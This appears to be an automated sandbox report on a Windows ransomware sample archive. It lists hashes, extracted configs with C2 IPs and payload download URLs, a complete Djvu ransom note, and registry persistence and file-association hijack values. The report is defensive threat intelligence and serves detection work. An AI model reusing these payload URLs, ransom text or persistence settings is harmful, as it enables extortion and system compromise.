Analysis
max time kernel: 138s
max time network: 140s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25-10-2024 21:25

Static task: static1
Behavioral task: behavioral1
Sample: RNSM00435.7z
Resource: win10v2004-20241007-en
General
Target: RNSM00435.7z
Size: 7.2MB
MD5: ebfbfabb47ffd00e16ebd8724c63adc5
SHA1: bb9c0edec43860dc1e5610716b5bc7164bde37ba
SHA256: fabdb10b28b5e0bd4c9b38be6292bc5966cb2dd2428486bad8f056fb4696be27
SHA512: 1b367064fd2f9fdf8bcaa787b1cdf4ff758fb7be875e466875b956a6d8607692843c7c12316a70671eb58480726513bad2217e0cbd292987143d22777855b101
SSDEEP: 196608:2zYGZc71m9mVl5WldX9NUc/g6thkfMLZfqoh4Za:6ZSm9mVl5WldTx2fMFBaZa
Malware Config

Extracted
crimsonrat
64.188.25.232

Extracted
djvu
http://asvb.top/nddddhsspen6/get.php
extension: .pcqq
offline_id: 3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1
payload_url:
http://asvb.top/files/penelop/updatewin1.exe
http://asvb.top/files/penelop/updatewin2.exe
http://asvb.top/files/penelop/updatewin.exe
http://asvb.top/files/penelop/3.exe
http://asvb.top/files/penelop/4.exe
http://asvb.top/files/penelop/5.exe
ransomnote: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-TVrnNufMGq Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0296Sirj

Extracted
C:\Program Files\dotnet\Restore-My-Files.txt
lockbit
http://lockbit-decryptor.top/?9AE2456EE17245AACA2CBD635B5B9B18
http://lockbitks2tvnmwk.onion/?9AE2456EE17245AACA2CBD635B5B9B18

Extracted
vidar
38.7
904
https://HAL9THapi.faceit.comramilgame
profile_id: 904

Extracted
urelas
112.175.88.207
112.175.88.208
Signatures

CrimsonRAT main payload 1 IoCs
resource | yara_rule
behavioral1/files/0x000a000000023b88-100.dat | family_crimsonrat
CrimsonRat
Crimson RAT is malware attributed to a Pakistan-linked threat actor.

Crimsonrat family
Detected Djvu ransomware 9 IoCs
resource | yara_rule
behavioral1/memory/4480-162-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/4480-160-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/4480-3789-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/4480-3833-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/5844-3839-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/5844-3837-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/5844-3842-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/5844-3843-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/5844-3857-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.

Djvu family

GandCrab payload 2 IoCs
resource | yara_rule
behavioral1/memory/3772-115-0x0000000000700000-0x0000000000717000-memory.dmp | family_gandcrab
behavioral1/memory/3772-114-0x0000000000400000-0x0000000000460000-memory.dmp | family_gandcrab

Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.

Gandcrab family

Lockbit
Ransomware family with multiple variants released since late 2019.

Lockbit family

Modifies WinLogon for persistence 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe \"C:\\Windows\\system32\\IExplorer.exe\"" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\IExplorer.exe" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe

Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Modifies visibility of hidden/system files in Explorer 2 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Urelas family

VanillaRat
VanillaRat is an advanced remote administration tool coded in C#.

Vanillarat family

Vidar family

Xmrig family

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.

Detected Nirsoft tools 1 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource | yara_rule
behavioral1/memory/540-113-0x0000000005250000-0x00000000052E6000-memory.dmp | Nirsoft

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid | Process
6796 | bcdedit.exe
6824 | bcdedit.exe

NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource | yara_rule
behavioral1/memory/540-113-0x0000000005250000-0x00000000052E6000-memory.dmp | WebBrowserPassView

Renames multiple (3303) files with added filename extension
This suggests ransomware activity: encrypting all the files on the system.

Vanilla Rat payload 2 IoCs
resource | yara_rule
behavioral1/files/0x000a000000023b85-84.dat | vanillarat
behavioral1/memory/4696-95-0x00000000008D0000-0x00000000008F2000-memory.dmp | vanillarat

Vidar Stealer 1 IoCs
resource | yara_rule
behavioral1/memory/4312-2697-0x0000000000400000-0x00000000004A8000-memory.dmp | family_vidar

XMRig Miner payload 8 IoCs
resource | yara_rule
behavioral1/memory/2864-3866-0x0000000140000000-0x000000014072E000-memory.dmp | xmrig
behavioral1/memory/2864-3868-0x0000000140000000-0x000000014072E000-memory.dmp | xmrig
behavioral1/memory/2864-3870-0x0000000140000000-0x000000014072E000-memory.dmp | xmrig
behavioral1/memory/2864-3872-0x0000000140000000-0x000000014072E000-memory.dmp | xmrig
behavioral1/memory/2864-3871-0x0000000140000000-0x000000014072E000-memory.dmp | xmrig
behavioral1/memory/2864-3874-0x0000000140000000-0x000000014072E000-memory.dmp | xmrig
behavioral1/memory/2864-3873-0x0000000140000000-0x000000014072E000-memory.dmp | xmrig
behavioral1/memory/2864-4191-0x0000000140000000-0x000000014072E000-memory.dmp | xmrig

pid | Process
6856 | wbadmin.exe

Disables RegEdit via registry modification 2 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe

Disables use of System Restore points 1 TTPs

Checks computer location settings 2 TTPs 8 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | HEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exe
Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe
Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | Trojan-Ransom.Win32.Gen.abhi-9e3ae46b36c519237def9e164f6261c2987a5385a96048efc8f7868a74154466.exe
Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | HEUR-Trojan-Ransom.MSIL.Blocker.gen-404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885.exe
Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | Trojan-Ransom.Win32.GenericCryptor.czo-44be0c9b9d42340cd693c9ed14888d44b967ea5c30c8d716c45efac5a4483bc4.exe
Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe
Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe

Drops startup file 4 IoCs
description | ioc | Process
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Startup .exe | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Startup .exe | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\STARTUP .exe | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\STARTUP .exe | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Executes dropped EXE 47 IoCs
pid | Process
4384 | HEUR-Trojan-Ransom.MSIL.Blocker.gen-404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885.exe
4696 | HEUR-Trojan-Ransom.MSIL.Blocker.gen-6d99e19a2bbf1a1e96e7dfcc2e38326e4015e924afa917e1333ffb44ab85ad44.exe
540 | HEUR-Trojan-Ransom.MSIL.Blocker.gen-fd0e85a143dccc8cee5c7c52ab2dba3a931c368bafbc886d6589d7b725313e48.exe
4776 | HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe
3156 | HEUR-Trojan-Ransom.MSIL.Foreign.gen-a01dc7b3599b680aaf57c8b1d4b1a20575c720bfe04f339748eb0f9194fcfffc.exe
4312 | HEUR-Trojan-Ransom.Win32.Convagent.gen-581af25d67022dadaf32cf3986bd5a79f4a7f822da606f89e3fd4acc90814163.exe
3772 | HEUR-Trojan-Ransom.Win32.GandCrypt.gen-612278239c759c6f8fa512a6b48887e502f4c989987c574213485b1eb318b545.exe
1052 | HEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exe
3944 | HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe
3328 | HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe
1840 | Trojan-Ransom.Win32.Cryptor.eet-d2464dd0508e2b8632fe91c5c0447e963026e4c722f078d93cdc97a3ed7c6c51.exe
3548 | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
2272 | Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe
244 | test.exe
4480 | HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe
5916 | xk.exe
5468 | IExplorer.exe
6276 | WINLOGON.EXE
5248 | CSRSS.EXE
6668 | SERVICES.EXE
5404 | LSASS.EXE
3160 | Trojan-Ransom.Win32.Gen.abhi-9e3ae46b36c519237def9e164f6261c2987a5385a96048efc8f7868a74154466.exe
6012 | Trojan-Ransom.Win32.GenericCryptor.czo-44be0c9b9d42340cd693c9ed14888d44b967ea5c30c8d716c45efac5a4483bc4.exe
6236 | Trojan-Ransom.Win32.Wanna.amap-5dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9.exe
6200 | SMSS.EXE
5680 | MediaFoundation.exe
2272 | Services.exe
6412 | huter.exe
1660 | HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe
5844 | HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe
5908 | shell.exe
2832 | shell.exe
4464 | shell.exe
652 | shell.exe
4740 | shell.exe
6724 | shell.exe
2600 | shell.exe
2852 | shell.exe
6524 | shell.exe
5580 | shell.exe
5220 | xk.exe
1332 | IExplorer.exe
6368 | WINLOGON.EXE
5400 | CSRSS.EXE
5252 | SERVICES.EXE
6396 | LSASS.EXE
6064 | SMSS.EXE
Modifies file permissions 1 TTPs 1 IoCs
pid | Process
6048 | icacls.exe

Modifies system executable filetype association 2 TTPs 13 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

resource | yara_rule
behavioral1/files/0x000a000000023b86-88.dat | vmprotect
behavioral1/memory/540-93-0x0000000000790000-0x0000000000A50000-memory.dmp | vmprotect

Adds Run key to start application 2 TTPs 9 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\Desktop\\00435\\HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe\"" | HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ecc3850c-a3f1-4e9f-bf3e-e16dac3f83c4\\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe\" --AutoStart" | HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Services.exe" | HEUR-Trojan-Ransom.MSIL.Blocker.gen-404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LogonAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System Monitoring = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysnet = "C:\\Users\\Admin\\AppData\\Local\\sysnetwin.exe" | HEUR-Trojan-Ransom.MSIL.Blocker.gen-fd0e85a143dccc8cee5c7c52ab2dba3a931c368bafbc886d6589d7b725313e48.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSMSGS = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServiceAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xk = "C:\\Windows\\xk.exe" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe

pid | Process
1564 | powershell.exe

Drops desktop.ini file(s) 4 IoCs
description | ioc | Process
File opened for modification | C:\desktop.ini | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File created | C:\desktop.ini | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened for modification | F:\desktop.ini | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File created | F:\desktop.ini | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe

Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\T: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\X: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\Y: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\B: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\E: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\G: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\J: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\Q: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\S: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\W: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\H: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\L: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\N: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\P: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\R: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\I: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\K: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\M: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\O: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\F: | HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe
File opened (read-only) | \??\U: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\V: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened (read-only) | \??\Z: | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
53 | api.2ip.ua
60 | api.2ip.ua
581 | api.2ip.ua

pid | Process
6424 | arp.exe

Drops file in System32 directory 6 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\IExplorer.exe | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened for modification | C:\Windows\SysWOW64\Mig2.scr | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File opened for modification | C:\Windows\SysWOW64\shell.exe | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File created | C:\Windows\SysWOW64\shell.exe | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File created | C:\Windows\SysWOW64\Mig2.scr | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File created | C:\Windows\SysWOW64\IExplorer.exe | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3328 set thread context of 4480 3328 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 132 PID 1660 set thread context of 5844 1660 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 169 PID 2272 set thread context of 2864 2272 Services.exe 174 -
resource yara_rule behavioral1/files/0x000400000001e776-164.dat upx -
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 4 IoCs
description | ioc | Process
File opened for modification | C:\Windows\xk.exe | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File created | C:\Windows\xk.exe | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
File created | C:\Windows\__tmp_rar_sfx_access_check_240682531 | Trojan-Ransom.Win32.Wanna.amap-5dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9.exe
File created | C:\Windows\eee.exe | Trojan-Ransom.Win32.Wanna.amap-5dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9.exe
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
3348 | sc.exe
6024 | sc.exe
4860 | sc.exe
6320 | sc.exe
4356 | sc.exe
7028 | sc.exe
6556 | sc.exe
6780 | sc.exe
6716 | sc.exe
288 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid | pid_target | Process | procid_target
